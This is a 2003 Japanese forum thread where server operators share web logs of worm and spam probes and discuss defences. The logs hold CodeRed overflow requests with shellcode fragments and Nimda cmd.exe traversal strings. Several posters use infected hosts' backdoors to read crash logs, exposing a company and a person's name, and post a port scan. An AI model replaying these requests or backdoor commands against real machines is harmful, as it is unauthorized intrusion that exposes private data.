03/04/09 08:49 .net
これは?
09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184

87:78
03/04/09 09:38 .net
板違いだけどついでにこれも
0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-"
多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。


88:DNS未登録さん
03/04/10 00:56 .net
>>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。
>>87 は外部から任意のポートに接続できるプロクシを狙った spammer。


89:DNS未登録さん
03/04/10 21:16 .net
最近、CONNECT~が増えてきましたね

90:DNS未登録さん
03/04/10 21:26 .net
あの手、この手ですよね。
まえにスパムを配信するウイルスの実験が行われていた可能性があると
記事で読んだ記憶があるけど。
スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。


91:DNS未登録さん
03/04/11 23:01 .net
メールヘッダーが変なんですけど。何かわかりますかね。
ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。
本文はスパムみたいなんですけど、sendmailのバグを狙っているような...
ワームの様な気もしてます。。。
Return-Path: <mailbox1@usgreencardoffice.com>
Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111])
by xxxx.jp (8.12.8/8.12.5)
with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>;
Fri, 11 Apr 2003 22:11:19 +0900
Received: from [154.33.63.58] (helo=mail8.cwidc.net)
by smtp1.cwidc.net
with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:11:01 +0900
Received: from pop
by mail8.cwidc.net
with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:10:57 +0900
Received: from [206.40.228.122] (helo=sm22.localdomain)
by mail8.cwidc.net
with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00;
Fri, 11 Apr 2003 22:10:56 +0900
Received: from unknown
Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT)
Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain>
Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz
B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC
F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei
ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C];
A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re
ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688]
@C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq
R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6>
2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re
ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@]
;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive
d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C];
A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT
T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]:
?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C];
ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]:
?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB]
@C];ARz M
Errors: mailbox1@usgreencardoffice.com
From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com>
To: Customer <customer@usgreencardoffice.com>
Subject: Get a Green Card for USA
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:


92:DNS未登録さん
03/04/13 20:57 .net
うざい
219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"



前にCodeRedに対抗するCode Greenてのが来たけど
もう来ないな。
またこないかな。

93:DNS未登録さん
03/04/15 13:45 .net
OrgName: Asia Pacific Network Information Centre
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7

ここ、IPうじゃうじゃ持ってて最高にうざい。
二日で100個以上CodeRed来てるけど、ここが8割占めてたw
LAN内全感染の悪寒。
ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが
全部穴になって被害を広めてるのね。

#Apache初心者だから、ログを取らせない方法が良くわかんねえよ。
・ウイルス扱いにする。
・指定ファイルにアクセスしようとしたのは載せない。
・実際に、0Byteの指定ファイルを作っておく。
があった。みんなどうよ?つーかどれが普通よ?

94:DNS未登録さん
03/04/15 13:53 .net
略称のほうは知ってた・・
APNICかよ。
マトモなとこだから他から経由されてるだけな気がするな・・・

95:DNS未登録さん
03/04/15 13:54 .net
>>93
それ中国あたりのブロック割り当てじゃない?
うちにも中国方面からガンガンくるよ。


96:DNS未登録さん
03/04/15 13:55 .net
>>93
ルーターで弾く。

97:DNS未登録さん
03/04/15 13:57 .net
>>96
手作業での登録ですか?
手間が馬鹿にならんので、テクニックあればいいんだけど。


98:DNS未登録さん
03/04/15 13:59 .net
>>95
JPNIC に関連団体で乗ってるところ。ほんとに感染してるなら微妙に恥かと。
URLリンク(216.239.57.100)

99:DNS未登録さん
03/04/15 14:53 .net
>>93
ネタだよね?ね?ね?

100:DNS未登録さん
03/04/15 17:33 .net
>>99
うちもきてるよ。


101:DNS未登録さん
03/04/15 19:33 .net
これが、この板の現実でしょ。悲しいけど。


102:DNS未登録さん
03/04/16 11:38 .net
CodeRedが大量に来てますね...
 ⇒219.156.232.21
  219.237.77.95
  219.181.154.52
  219.140.211.162
  12.235.16.127
あと、ガーラって調査会社のロボット検索もウザイ
 ⇒211.4.250.133

103:DNS未登録さん
03/04/16 15:34 .net
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
NetRange: 219.0.0.0 - 219.255.255.255
CIDR: 219.0.0.0/8
NetName: APNIC5
NetHandle: NET-219-0-0-0-1


104:DNS未登録さん
03/04/16 15:35 .net
OrgName: AT&T WorldNet Services
OrgID: ATTW
Address: 400 Interpace Parkway
City: Parsippany
StateProv: NJ
PostalCode: 07054
Country: US
NetRange: 12.0.0.0 - 12.255.255.255
CIDR: 12.0.0.0/8
NetName: ATT
NetHandle: NET-12-0-0-0-1


105:DNS未登録さん
03/04/16 15:37 .net

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.4.250.0
b. [ネットワーク名] I2TS-NET
f. [組織名] 株式会社イーツ
g. [Organization] I2ts Inc.,
m. [運用責任者] MK5986JP
n. [技術連絡担当者] HI1771JP
n. [技術連絡担当者] MK5986JP
>>102
ってなってるけど、がーらって会社なの?

106:DNS未登録さん
03/04/16 17:55 .net
>>105
ネタですか?(w

107:DNS未登録さん
03/04/16 20:24 .net
>>105
nslookupで逆引きすると、gala-net.co.jpという
ドメインが出てきます。何の会社かと思って
ホームページを見たら、ネット上の書き込みを
自動巡回してチェックするサービスを提供していました。
最近、フレッシュアイのロボット検索が定期的に
来るようになって、フレッシュアイにも情報が
登録されたんですが、それをガーラのロボットが
検出して、探りを入れに来ているようです。

108:山崎渉
03/04/17 12:00 .net
(^^)

109:DNS未登録さん
03/04/18 23:31 9c62ManQ.net
YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178
220.13.168.112うざすぎ。
YBBにメールして遮断できないものだろうか…

110:DNS未登録さん
03/04/19 01:06 .net
>>109
ごめん

111:DNS未登録さん
03/04/19 01:07 .net
>>100
来ている来ていないの問題じゃなくて(ry

112:DNS未登録さん
03/04/19 09:15 .net
>>109
YBBならIP変わらないみたいだから、アクセス制限リストに
放り込んで置けば宜しいかと。まあ、それでも鬱陶しい
事に変わりは無いけど。

113:DNS未登録さん
03/04/19 22:57 .net
>>109
入り込んで止めてあげたら?(w

114:山崎渉
03/04/20 05:53 .net
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

115::
03/04/21 18:07 j62Px7e4.net
☆^~^★ 50音順で探せて楽して得する
URLリンク(sagatoku.fc2web.com)
   あなたの探し物きっとみつかるよ☆^~^★


116:DNS未登録さん
03/04/22 04:26 .net
>>113
それってCodeGreen…w

117:DNS未登録さん
03/04/30 19:11 .net
最近こんなのが来てる。
202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-"
202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-"


118:初心者
03/04/30 21:09 .net
当方やふーbbですが、
昨日Anhttpdで適当にweb鯖を立てて放置したところ
いろいろ釣れました。
なんですかコリャ?
相手もやふーbbのようで。。
感染したワームが、一体何をしようとしているのだかよく分からんが
xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか?
一日中こんなの送ってきて動作が重くなったりしないんだろか
219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u
8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215



119:初心者
03/04/30 21:14 .net
って最初の219.144.82.204は中国の鯖っぽいな。
アクセスしようとしたら漢字だらけの404が返ってきた。
やふーbbの方はアホなユーザーがワームに感染していることも知らず
繋ぎっ放しにしているのかなぁ・・・

120:DNS未登録さん
03/04/30 21:14 .net
飽きるほど見たNimdaだな。

121:DNS未登録さん
03/04/30 21:28 .net
感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。


122:DNS未登録さん
03/05/01 00:23 .net
つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・

123:119
03/05/01 00:56 .net
>>122
すんマソ。良く見たら
殆んど同じような報告がいくつも書かれていた…。
初心者なので変なのが飛んできたことが嬉しくて
ついつい書いてしまったのでつた。


124:119
03/05/01 01:05 .net
こう言うワームの類って、
鯖にセキュリティーホールが無ければ直接害は無いんだよね?
しかし大量に飛んでくると
ログ作成するのに負荷が掛かるってのがあるか…
ルーターでワームだけをカットするような設定は、
簡単には出来るんかなぁ
IP指定するのは当然出来るが
こうあちこちから飛んでくると切りが無い。

125:DNS未登録さん
03/05/02 11:05 .net
だから、IP弾きは自動化できないって・・・
つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら
教えてもらいたい・・・
なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると
困る可能性がある。
困ったときには、どこのブラックリストの一部が困ったのかわからないので
ブラックリスト自体を消す羽目になる。
以上無理。

126:DNS未登録さん
03/05/02 22:29 .net
IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する
ハードウェアルータがあったら良いのにな
もちろん検出パターンはメーカーからの自動更新で。

127:DNS未登録さん
03/05/02 23:18 .net
>>118
219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁
URLリンク(219.180.88.36)"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

128:DNS未登録さん
03/05/03 00:31 .net
>>127
> Windows 2000 Version: 5.0
> 現在のビルド: 2195
> Service Pack: None
> 現在のタイプ: Uniprocessor Free
> 登録されている会社名: (・∀・)
> 登録されている所有者: (・∀・)
禿げ藁
常時接続のくせにServicePackも当てとらんとは、
もしや、ワレザーだったりしてな。
今頃Winnyでエロ画像落としてハァハァしてるんだろ

129:DNS未登録さん
03/05/03 02:47 .net
MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。
tptp.exeが大活躍していたりはするけどw
2ちゃんねらーにしては激しくツマンナイ椰子やね。

こういうのが糞スレ立てるんだろうな。

130:129
03/05/03 02:49 .net
tftp.exeの間違い(欝氏

131:DNS未登録さん
03/05/03 11:11 OG87RHjs.net
WHOISでみるかぎりコリアみたいですねー
210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
これはチャイナ
210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

132:DNS未登録さん
03/05/03 12:20 8w0u+xU1.net
とりあえず、今日だけの分でも素のIPを晒します。
211.153.19.148
211.180.229.213
211.114.27.16
211.249.78.151
211.116.251.18
上から順に新しい
全てCoderedに感染。しかも日本のIPかな?よく分からん。

133:DNS未登録さん
03/05/03 12:23 8w0u+xU1.net
って調べたら、前のとあわせて全部国はオーストラリアじゃん!!

134:DNS未登録さん
03/05/03 12:26 7iA2vytO.net
URLリンク(www13.big.or.jp)
荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。
これと同じヤツをいろんなヤツにコピペしてね

135:DNS未登録さん
03/05/03 13:27 .net
>>133
馬鹿は whois を使うな。

136:DNS未登録さん
03/05/03 20:46 .net
>>126
IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。
NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、
スループットが低いので、光ユーザーだと勿体無い。
URLリンク(www.trendmicro.com)
>>127
>>128
>>129
不味くないか?


137:DNS未登録さん
03/05/04 01:25 .net
>>127-129
通報しますた!
と、言いたい所だが不正アクセス等を
相手は全く理解していない予感…

138:
03/05/08 14:27 .net
少なくともこれらのリクエスト送ってくるヤツらは
MSのIISを立ち上げてる、と考えていいのですか?
202.125.153.14
61.187.64.194
202.39.15.237
202.131.151.20
202.194.196.67
これらはホスト名逆引きできないんですが、どういうことでしょうか。

139:138
03/05/08 14:29 .net
ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。

140:DNS未登録さん
03/05/08 16:36 .net
>>138
> これらはホスト名逆引きできないんですが、どういうことでしょうか。
ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net)
>>139
> ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。
赤帽と窓のデュアルブート環境だから。

141:DNS未登録さん
03/05/08 16:41 .net
キャリア

142: 
03/05/10 04:49 .net
赤帽と窓のデュアルブート環境だから。
意味が分からない、apacheが立ち上がってるのに
なぜIISに感染するcode redが動いてるの?
Linuxが動いてるはずなのに。

143:DNS未登録さん
03/05/10 11:09 .net
再接続でアドレスが変わったんじゃなーの?
んで、たまたま新たに割り振られた先に赤帽&apacheがあったとか。

144:演@ usen-43x233x52x230.ap-USEN.usen.ad.jp
03/05/10 11:44 .net
>>142
Win32版&IISだったとか(Linuxの根拠は。

145:DNS未登録さん
03/05/10 14:08 .net
>144
実際にアクセスしてみてヘッダを見てからの発言だろーな?

146:演@ usen-43x233x52x230.ap-USEN.usen.ad.jp
03/05/10 18:43 .net
>>146
ルータの下でポートフォワードで複数動かしてるとか。

147:DNS未登録さん
03/05/10 19:51 .net
自問自答ですか?

148:DNS未登録さん
03/05/11 02:29 .net
ログの中にこんなの発見した
218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET URLリンク(www.21cn.net) HTTP/1.1" 200 1529
何?

149:
03/05/11 03:27 .net
というか、不毛にIIS動かしてるバカ多すぎ。
トラフィックの無駄遣いも甚だしい。
どうせ何のサービスかわかってないような輩だろ。
NT系、デフォルトでIISなんて入ってないはずなのに
なんで動いてるんだ。取り敢えず腹が立つ。

150:DNS未登録さん
03/05/11 03:59 .net
202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-"
URLリンク(202.196.110.208)
チョン国の中学校の鯖が感染しております。
なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん(T_T)
>>128のような情報を引っ張るにはどうしたらいいの?
URLリンク(IP)アドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
ってリクエストすればいいの?404なったけど。

151:DNS未登録さん
03/05/11 10:37 M3fadPgI.net
URLリンク(bizinfo.cool.ne.jp)

152:DNS未登録さん
03/05/11 13:26 x4ndWFzf.net
>貴方感染
もしかしたら、なんとなく程度だとしても意味が通じるかもしれない

>鯖PC
これは絶対無理(藁


153:DNS未登録さん
03/05/11 13:29 .net
>>150
英語で送っとけ
中国のエリートならペラペラだから

154:DNS未登録さん
03/05/11 14:10 .net
そして、その中国のエリートが管理する鯖は穴だらけ。

155:●かろりーたさん ◆JwU5Ac6TK2
03/05/11 14:56 .net
>>148
URLリンク(www.21cn.net)
がそのIPアドレスにあると勘違い(?)して参照しようとしてきたリクエスト

156:DNS未登録さん
03/05/11 14:57 .net


157:DNS未登録さん
03/05/11 15:21 .net
>>149
漏れW2Kでサービスをいじってたら、
知らぬ間にIISが動作していたよ・・・
ANHTTPD起動しようとしたが
80番ポートが開いてないエラーが出るので調べていたら発覚した
そんな香具師が意外と多い予感


158:貴方感染
03/05/11 15:52 .net
>貴方感染
我SARS否
とか、帰ってきそう(汗
>>149
>>157
そうなんですよね。
ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに
やり場のない怒りと、やるせなさと…


159:148
03/05/11 19:09 .net
>>155
なるほど。
けどうちはURLリンク(www.21cn.net)じゃないのになぜ200を返したんでしょうか?
cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。

160:DNS未登録さん
03/05/11 20:36 .net
>>159
踏み台にして失敗したものです。
気になるようだったら、
SetEnvIf HOST FQDN allowed01
deny from env=!allowed01
にしとけば、403返すかと。

161:演@ usen-43x233x52x230.ap-USEN.usen.ad.jp
03/05/12 02:43 .net
>>150
>貴方感染
チョン環境っていうより大陸向けのような気もします。
半島って標準で和文や簡体、繁体フォント入ってるのかなあ。
マジレスすると普通に
Your environment is infected with the virus
and it is troubled. Please carry out somehow.
とかのほうが(文字コードだなんだ考えずに済んで)いいと思います。

162:148-159
03/05/12 13:50 .net
>>160
あ、そうだったんですか。
うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。
教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。
「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り
HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ
ラーが返る。」とありましたので、httpd.confに設定してみました。
しばらくこれで様子を見てみます。ありがとうございました。
今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。
ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ
ックするぐらいしか出来ませんが、地道にやっていきます。

163:DNS未登録さん
03/05/13 01:52 .net
64.110.110.240
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
(略)
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ090ヨ190ヨ0c3ヨ003ヨb00ヨ31bヨ3ffヨ078ヨ000ヨ0=a
ウガンダキタ━━━(゚∀゚)━━━━!!!!!

164:DNS未登録さん
03/05/15 09:44 NUYgsRrd.net
202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-"
最近多いのですが、このリクエストは何でしょうか?新手のワーム?

165:DNS未登録さん
03/05/15 21:13 y3uNO88M.net
219.218.95.81 - - [15/May/2003:17:46:54 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-"


166:_
03/05/15 21:49 .net
  ∋8ノノハ.∩  
   川o・-・)ノ <先生!こんなのがありました!
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)

167: ◆CfyWV6PsHI
03/05/16 00:12 .net
ワーム対策にバーチャルホストはどうよ
HTTP_HOSTがない場合はダミーページの飛ばす


168: ◆CfyWV6PsHI
03/05/16 00:14 .net
ログをバーチャルホスト毎に記録すれば
ワームのログは通常のログに混じらないが

169:山崎渉
03/05/22 01:54 .net
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

170:DNS未登録さん
03/05/23 20:57 .net
203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373


171:山崎渉
03/05/28 17:09 .net
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎―◎                      山崎渉

172:DNS未登録さん
03/05/29 00:01 .net
初心者からの素朴な疑問
例えば、
c:/www/scripts/..チ/winnt/system32/cmd.exe
にワームがアクセスしてくるとしますよね。
該当するディレクトリを作って、cmd.exeって名前のファイル(例えばフロッピーにアクセスし続けるファイルとか)置いといたらどうなるんでしょ?

173:DNS未登録さん
03/05/31 23:54 9YFZ/gSa.net
きのうの夕方に同一IPから5秒おきに20連発
"GET /NULL.IDA?CCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000
%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000
%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\
xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\
x90\x90\x90\x8b\xf7f\xb8H\x063 ...
<以下略、とても長い>

174:DNS未登録さん
03/06/01 07:30 .net
>>173
それうちにも来た。
そのあとなんか意味不明な文字があってしかもログが改行されちゃう。
何なのそれ?

175:DNS未登録さん
03/06/01 13:04 .net
>>174
スレリンク(mysv板:170番)

176:DNS未登録さん
03/06/10 00:05 .net
久々にIRC繋いだら、こんなん帰ってきたのだが…
irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272
ワームチェックかなんかでしょうか?

177:
03/06/14 03:18 .net
URLリンク(yahoobb219055208068.bbtec.net)
バッチリ幹線してるようです。
[2ch@localhost 2ch]wget --spider URLリンク(yahoobb219055208068.bbtec.net)
1 HTTP/1.1 200 OK
2 Server: Microsoft-IIS/5.0
3 Date: Fri, 13 Jun 2003 18:18:56 GMT
4 Connection: keep-alive
5 Connection: Keep-Alive
6 Content-Length: 1230
7 Content-Type: text/html
8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/
9 Cache-control: private
200 OK
どうやって警告したらいいでしょうか。

178:
03/06/14 03:21 .net
ftpとか開いてるし、アノニログインできるし(;´Д`)
厨房運営の鯖でしょうか。
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
6699/tcp open napster

179:
03/06/14 03:25 .net
いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな?
hURLリンク(yahoobb219055208068.bbtec.net)"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
アプリケーション例外が発生しました:
アプリケーション: (pid=1020)
発生時間: 2003/05/01 @ 21:50:51.907
例外番号: c0000005 (アクセス違反)
*----> システム情報 <----*
コンピュータ名: VFGYARXITW27V4Y
ユーザー名: Administrator
プロセッサの数: 1
プロセッサの種類: x86 Family 6 Model 8 Stepping 6
Windows 2000 Version: 5.0
現在のビルド: 2195
Service Pack: None
現在のタイプ: Uniprocessor Free
登録されている会社名: 日本フレートライナー(株)
登録されている所有者: 山﨑勝行


180:DNS未登録さん
03/06/14 05:53 .net
>>179
通報しますた。

181:DNS未登録さん
03/06/14 07:32 CsSAkb5z.net
